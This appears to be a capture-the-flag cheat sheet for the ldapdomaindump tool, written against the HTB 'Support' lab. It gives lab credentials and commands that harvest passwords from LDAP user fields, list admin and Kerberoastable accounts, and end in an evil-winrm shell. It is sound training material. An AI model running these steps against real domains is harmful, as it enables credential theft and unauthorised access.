ldapdomaindump.md (15955B)
1 --- 2 title: "ldapdomaindump" 3 description: "pip3 install ldapdomaindump" 4 category: active-directory 5 subcategory: "Tooling & Recon" 6 tags: ["active-directory"] 7 tools: ["Nmap", "NetExec", "BloodHound", "ldapsearch", "Evil-WinRM"] 8 difficulty: intermediate 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/ldapdomaindump.md" 11 --- 12 # Complete ldapdomaindump Cheat Sheet for HTB Support 13 14 **Target Information:** 15 - **Domain:** support.htb 16 - **Username:** ldap 17 - **Password:** nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz 18 - **Full User Format:** support.htb\ldap or ldap@support.htb 19 20 *** 21 22 ## What is ldapdomaindump? 23 24 **ldapdomaindump** is a Python tool that performs comprehensive Active Directory enumeration via LDAP and outputs the results in **human-readable HTML files** and **JSON files** for further processing. It's essentially an automated LDAP enumeration tool that saves you from running dozens of individual ldapsearch commands. 25 26 ### Why Use ldapdomaindump? 27 28 | Feature | Benefit | 29 |---------|---------| 30 | **Automated Enumeration** | Runs multiple LDAP queries automatically | 31 | **HTML Reports** | Easy-to-read tables you can view in a browser | 32 | **JSON Output** | Machine-readable format for scripting/parsing | 33 | **Comprehensive** | Dumps users, groups, computers, trusts, policies in one go | 34 | **No BloodHound Needed** | Lightweight alternative when you just need basic enumeration | 35 | **Grep-able JSON** | The JSON files let you search for passwords in `info` fields | 36 37 *** 38 39 ## Installation 40 41 ```bash 42 # Install via pip (recommended) 43 pip3 install ldapdomaindump 44 45 # Install from GitHub (latest version) 46 git clone https://github.com/dirkjanm/ldapdomaindump.git 47 cd ldapdomaindump 48 pip3 install . 49 50 # On Kali Linux (usually pre-installed) 51 apt install ldapdomaindump 52 53 # Verify installation 54 ldapdomaindump --help 55 ``` 56 57 *** 58 59 ## Basic Command Syntax 60 61 ```bash 62 ldapdomaindump [options] HOSTNAME 63 ``` 64 65 The tool requires: 66 1. **Authentication credentials** (`-u` and `-p`) 67 2. **Target hostname** (domain name or IP address) 68 69 *** 70 71 ## Essential Commands for HTB Support 72 73 ### Standard Enumeration (Recommended) 74 75 ```bash 76 # Basic enumeration with output directory 77 ldapdomaindump -u support.htb\\ldap \ 78 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 79 support.htb \ 80 -o ldap_output 81 ``` 82 83 **What this does:** 84 - `-u support.htb\\ldap` - Authenticates as the ldap user in the support.htb domain (note the double backslash) 85 - `-p 'password'` - Provides the password (single quotes protect special characters) 86 - `support.htb` - The target domain/hostname 87 - `-o ldap_output` - Creates a directory called `ldap_output` and saves all results there 88 89 ### Using IP Address Instead 90 91 ```bash 92 # Connect via IP (useful if DNS isn't working) 93 ldapdomaindump -u support.htb\\ldap \ 94 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 95 10.10.11.174 \ 96 -o ldap_output 97 ``` 98 99 ### Alternative Username Formats 100 101 ```bash 102 # Format 1: DOMAIN\username (requires double backslash in bash) 103 ldapdomaindump -u support.htb\\ldap \ 104 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 105 support.htb \ 106 -o ldap_output 107 108 # Format 2: username@domain (UPN format) 109 ldapdomaindump -u ldap@support.htb \ 110 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 111 support.htb \ 112 -o ldap_output 113 114 # Format 3: Just username (less reliable) 115 ldapdomaindump -u ldap \ 116 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 117 support.htb \ 118 -o ldap_output 119 ``` 120 121 *** 122 123 ## Output Files Generated 124 125 After running ldapdomaindump, you'll get **6 HTML files** and **6 JSON files**: 126 127 | File Name | Description | What to Look For | 128 |-----------|-------------|------------------| 129 | **domain_users.html/json** | All user accounts in the domain | Passwords in `info`/`description` fields, service accounts, privileged users | 130 | **domain_groups.html/json** | All security groups | Domain Admins, Enterprise Admins, Remote Management Users | 131 | **domain_computers.html/json** | All computer objects | Domain controllers, servers, workstations, OS versions | 132 | **domain_policy.html/json** | Domain password policy | Min password length, lockout policy, password age | 133 | **domain_trusts.html/json** | Trust relationships | External domains, trust direction and type | 134 | **domain_users_by_group.html/json** | Users organized by group membership | Quick view of who's in what group | 135 136 ### Example Output Directory 137 138 ```bash 139 ldap_output/ 140 ├── domain_computers.html 141 ├── domain_computers.json 142 ├── domain_groups.html 143 ├── domain_groups.json 144 ├── domain_policy.html 145 ├── domain_policy.json 146 ├── domain_trusts.html 147 ├── domain_trusts.json 148 ├── domain_users.html 149 ├── domain_users.json 150 ├── domain_users_by_group.html 151 └── domain_users_by_group.json 152 ``` 153 154 *** 155 156 ## Analyzing the Output 157 158 ### Critical Information to Check 159 160 #### 1. **domain_users.json** - Hunt for Passwords! 161 162 ```bash 163 # Search for passwords in info fields (HTB Support specific!) 164 grep -i "info" ldap_output/domain_users.json 165 166 # Search for description fields 167 grep -i "description" ldap_output/domain_users.json 168 169 # Search for specific user 170 grep -A 20 '"name": "support"' ldap_output/domain_users.json 171 172 # Look for service accounts 173 grep -i "service\|svc\|admin" ldap_output/domain_users.json 174 ``` 175 176 **In HTB Support, this reveals:** 177 ```json 178 { 179 "name": "support", 180 "info": "Ironside47pleasure40Watchful", 181 "memberOf": [ 182 "CN=Shared Support Accounts,CN=Users,DC=support,DC=htb", 183 "CN=Remote Management Users,CN=Builtin,DC=support,DC=htb" 184 ] 185 } 186 ``` 187 188 #### 2. **domain_groups.json** - Privileged Groups 189 190 ```bash 191 # Find Domain Admins 192 grep -A 10 "Domain Admins" ldap_output/domain_groups.json 193 194 # Find Remote Management Users (WinRM access!) 195 grep -A 10 "Remote Management Users" ldap_output/domain_groups.json 196 197 # Find all admin groups 198 grep -i "admin" ldap_output/domain_groups.json 199 ``` 200 201 #### 3. **domain_computers.json** - Target Systems 202 203 ```bash 204 # Find domain controllers 205 grep -i "SERVER\|DC" ldap_output/domain_computers.json 206 207 # Check operating systems 208 grep "operatingSystem" ldap_output/domain_computers.json 209 ``` 210 211 #### 4. **View HTML in Browser** 212 213 ```bash 214 # Open in default browser (Linux) 215 firefox ldap_output/domain_users.html 216 217 # Python simple HTTP server to view all files 218 cd ldap_output 219 python3 -m http.server 8000 220 # Then browse to http://localhost:8000 221 ``` 222 223 *** 224 225 ## Advanced Usage 226 227 ### Resolve All Objects (Slower but More Complete) 228 229 ```bash 230 # Resolve all LDAP object references to names 231 ldapdomaindump -u support.htb\\ldap \ 232 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 233 support.htb \ 234 -o ldap_output \ 235 -r 236 ``` 237 238 **What `-r` does:** Resolves SIDs and DNs to readable names, but takes longer to complete. 239 240 ### Use LDAPS (SSL/TLS) 241 242 ```bash 243 # Connect via LDAPS on port 636 244 ldapdomaindump -u support.htb\\ldap \ 245 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 246 support.htb \ 247 -o ldap_output \ 248 -l ldaps://support.htb:636 249 ``` 250 251 ### No HTML Output (JSON Only) 252 253 ```bash 254 # Generate only JSON files (faster, no HTML rendering) 255 ldapdomaindump -u support.htb\\ldap \ 256 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 257 support.htb \ 258 -o ldap_output \ 259 --no-html 260 ``` 261 262 ### No JSON Output (HTML Only) 263 264 ```bash 265 # Generate only HTML files 266 ldapdomaindump -u support.htb\\ldap \ 267 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 268 support.htb \ 269 -o ldap_output \ 270 --no-json 271 ``` 272 273 *** 274 275 ## Complete Enumeration Workflow 276 277 ### Step 1: Run ldapdomaindump 278 279 ```bash 280 ldapdomaindump -u support.htb\\ldap \ 281 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 282 support.htb \ 283 -o ldap_output 284 ``` 285 286 **Expected Output:** 287 ``` 288 [*] Connecting to host... 289 [*] Binding to host 290 [+] Bind OK 291 [*] Starting domain dump 292 [+] Domain dump finished 293 ``` 294 295 ### Step 2: Check User Info Fields for Passwords 296 297 ```bash 298 # Quick check for passwords in info fields 299 grep -i "info" ldap_output/domain_users.json | grep -v '""' 300 301 # More detailed search 302 jq '.[] | select(.info != "") | {name: .name, info: .info, memberOf: .memberOf}' ldap_output/domain_users.json 303 ``` 304 305 ### Step 3: Identify Privileged Users 306 307 ```bash 308 # Users in Remote Management Users group 309 jq '.[] | select(.memberOf[]? | contains("Remote Management Users")) | .name' ldap_output/domain_users.json 310 311 # Users with adminCount=1 312 grep -B 5 '"adminCount": 1' ldap_output/domain_users.json 313 ``` 314 315 ### Step 4: View HTML Reports 316 317 ```bash 318 # Start web server to view all reports 319 cd ldap_output 320 python3 -m http.server 8000 321 ``` 322 323 Then open your browser to: 324 - http://localhost:8000/domain_users.html 325 - http://localhost:8000/domain_groups.html 326 - http://localhost:8000/domain_computers.html 327 328 *** 329 330 ## Parsing JSON Output with jq 331 332 ```bash 333 # Pretty print entire user list 334 jq '.' ldap_output/domain_users.json 335 336 # Get all usernames 337 jq '.[].name' ldap_output/domain_users.json 338 339 # Users with non-empty info fields 340 jq '.[] | select(.info != "") | {name: .name, info: .info}' ldap_output/domain_users.json 341 342 # Users with "admin" in their name 343 jq '.[] | select(.name | contains("admin"))' ldap_output/domain_users.json 344 345 # Get Domain Admins members 346 jq '.[] | select(.name == "Domain Admins") | .members' ldap_output/domain_groups.json 347 348 # Count total users 349 jq '. | length' ldap_output/domain_users.json 350 351 # Export usernames to file 352 jq -r '.[].name' ldap_output/domain_users.json > usernames.txt 353 ``` 354 355 *** 356 357 ## Common Use Cases 358 359 ### Finding Credentials (HTB Support Scenario) 360 361 ```bash 362 # 1. Run ldapdomaindump 363 ldapdomaindump -u support.htb\\ldap \ 364 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 365 support.htb \ 366 -o ldap_output 367 368 # 2. Search for passwords in info field 369 grep "info" ldap_output/domain_users.json | grep -v '""' 370 371 # 3. You'll find: 372 # "info": "Ironside47pleasure40Watchful" 373 374 # 4. Test the credentials 375 crackmapexec smb support.htb -u support -p 'Ironside47pleasure40Watchful' 376 ``` 377 378 ### Building a Target List 379 380 ```bash 381 # Extract all usernames 382 jq -r '.[].name' ldap_output/domain_users.json > users.txt 383 384 # Extract all computer names 385 jq -r '.[].name' ldap_output/domain_computers.json > computers.txt 386 387 # Extract users with descriptions (might contain passwords) 388 jq '.[] | select(.description != "") | {name: .name, description: .description}' ldap_output/domain_users.json 389 ``` 390 391 ### Identifying High-Value Targets 392 393 ```bash 394 # Domain Admins 395 jq '.[] | select(.name == "Domain Admins")' ldap_output/domain_groups.json 396 397 # Enterprise Admins 398 jq '.[] | select(.name == "Enterprise Admins")' ldap_output/domain_groups.json 399 400 # Users with SPNs (Kerberoastable) 401 jq '.[] | select(.servicePrincipalName != null) | {name: .name, spn: .servicePrincipalName}' ldap_output/domain_users.json 402 ``` 403 404 *** 405 406 ## Troubleshooting 407 408 ### Error: "Could not connect to host" 409 410 ```bash 411 # Check if LDAP port is open 412 nmap -p 389,636,3268,3269 support.htb 413 414 # Try with IP instead of hostname 415 ldapdomaindump -u support.htb\\ldap \ 416 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 417 10.10.11.174 \ 418 -o ldap_output 419 420 # Try LDAPS 421 ldapdomaindump -u support.htb\\ldap \ 422 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 423 support.htb \ 424 -o ldap_output \ 425 -l ldaps://support.htb 426 ``` 427 428 ### Error: "Bind failed" 429 430 ```bash 431 # Check username format 432 # Try different formats: 433 434 # Format 1: DOMAIN\user 435 ldapdomaindump -u support.htb\\ldap -p 'password' support.htb -o ldap_output 436 437 # Format 2: user@domain 438 ldapdomaindump -u ldap@support.htb -p 'password' support.htb -o ldap_output 439 440 # Verify credentials with crackmapexec 441 crackmapexec ldap support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 442 ``` 443 444 ### Password with Special Characters 445 446 ```bash 447 # Always use single quotes to protect special characters 448 ldapdomaindump -u support.htb\\ldap \ 449 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 450 support.htb \ 451 -o ldap_output 452 453 # Alternatively, escape special characters 454 ldapdomaindump -u support.htb\\\\ldap \ 455 -p nvEfEK16\^1aM4\$e7AclUf8x\$tRWxPWO1%lmz \ 456 support.htb \ 457 -o ldap_output 458 ``` 459 460 *** 461 462 ## Converting to BloodHound Format 463 464 ldapdomaindump output can be converted to BloodHound-compatible JSON: 465 466 ```bash 467 # Clone the converter tool 468 git clone https://github.com/blurbdust/ldd2bh.git 469 cd ldd2bh 470 471 # Convert ldapdomaindump output 472 python3 ldd2bh.py -d /path/to/ldap_output 473 474 # Import the generated JSON files into BloodHound 475 ``` 476 477 *** 478 479 ## Comparison with Other Tools 480 481 | Tool | Speed | Output Format | Use Case | 482 |------|-------|---------------|----------| 483 | **ldapdomaindump** | Medium | HTML + JSON | Quick human-readable enumeration | 484 | **BloodHound** | Slow | Neo4j Graph | Complex attack path analysis | 485 | **ldapsearch** | Fast | LDIF/Text | Specific targeted queries | 486 | **crackmapexec** | Fast | Terminal | Quick validation and spraying | 487 | **windapsearch** | Medium | Text | Python-based enumeration | 488 489 **When to use ldapdomaindump:** 490 - You want quick, comprehensive enumeration 491 - You prefer browsing HTML tables 492 - You need JSON for scripting 493 - You don't need complex graph analysis 494 - You're on a slow connection (BloodHound can be heavy) 495 496 *** 497 498 ## Complete Command Reference Table 499 500 | Flag | Long Form | Description | Example | 501 |------|-----------|-------------|---------| 502 | `-u` | `--user` | Username for authentication (DOMAIN\user or user@domain) | `-u support.htb\\ldap` | 503 | `-p` | `--password` | Password (use single quotes for special chars) | `-p 'password123'` | 504 | `-o` | `--outdir` | Output directory for results | `-o ldap_output` | 505 | `-l` | `--ldapurl` | Custom LDAP URL | `-l ldaps://dc.support.htb:636` | 506 | `-r` | `--resolve` | Resolve all LDAP references (slower but more complete) | `-r` | 507 | `-m` | `--minimal` | Minimal output, only essential attributes | `-m` | 508 | `-n` | `--dns-server` | Custom DNS server IP | `-n 10.10.11.174` | 509 | `-d` | `--debug` | Enable debug output | `-d` | 510 | `--no-html` | N/A | Don't generate HTML files (JSON only) | `--no-html` | 511 | `--no-json` | N/A | Don't generate JSON files (HTML only) | `--no-json` | 512 | `--no-grep` | N/A | Don't generate grep-able output | `--no-grep` | 513 514 *** 515 516 ## Quick Reference Commands 517 518 ```bash 519 # Standard enumeration 520 ldapdomaindump -u support.htb\\ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' support.htb -o ldap_output 521 522 # With resolution (slower, more detail) 523 ldapdomaindump -u support.htb\\ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' support.htb -o ldap_output -r 524 525 # Via IP address 526 ldapdomaindump -u support.htb\\ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 10.10.11.174 -o ldap_output 527 528 # JSON only (faster) 529 ldapdomaindump -u support.htb\\ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' support.htb -o ldap_output --no-html 530 531 # LDAPS connection 532 ldapdomaindump -u support.htb\\ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' support.htb -o ldap_output -l ldaps://support.htb:636 533 534 # Hunt for passwords 535 grep -i "info\|description" ldap_output/domain_users.json | grep -v '""' 536 537 # View in browser 538 cd ldap_output && python3 -m http.server 8000 539 ``` 540 541 *** 542 543 ## Pro Tips for HTB Support 544 545 1. **The info field contains the password** - Always check `domain_users.json` for the `info` attribute 546 2. **Check group memberships** - Look for "Remote Management Users" to find WinRM-enabled accounts 547 3. **JSON is greppable** - Use `grep`, `jq`, or `cat` to search the JSON files 548 4. **HTML is browsable** - Open the HTML files in a browser for easier reading 549 5. **Compare with BloodHound** - Run both tools for comprehensive coverage 550 6. **Save your output** - Keep the output directory for reference throughout the engagement 551 7. **No creds needed first** - Always run anonymous ldapsearch for namingContexts before ldapdomaindump 552 553 ## Complete HTB Support Attack Flow 554 555 ```bash 556 # Step 1: Discover base DN (no auth) 557 ldapsearch -x -H ldap://support.htb -b "" -s base namingContexts 558 559 # Step 2: Run ldapdomaindump with initial creds 560 ldapdomaindump -u support.htb\\ldap \ 561 -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \ 562 support.htb \ 563 -o ldap_output 564 565 # Step 3: Find password in info field 566 grep "info" ldap_output/domain_users.json | grep -v '""' 567 # Result: "info": "Ironside47pleasure40Watchful" 568 569 # Step 4: Verify new credentials 570 crackmapexec winrm support.htb -u support -p 'Ironside47pleasure40Watchful' 571 572 # Step 5: Get shell 573 evil-winrm -i support.htb -u support -p 'Ironside47pleasure40Watchful' 574 ```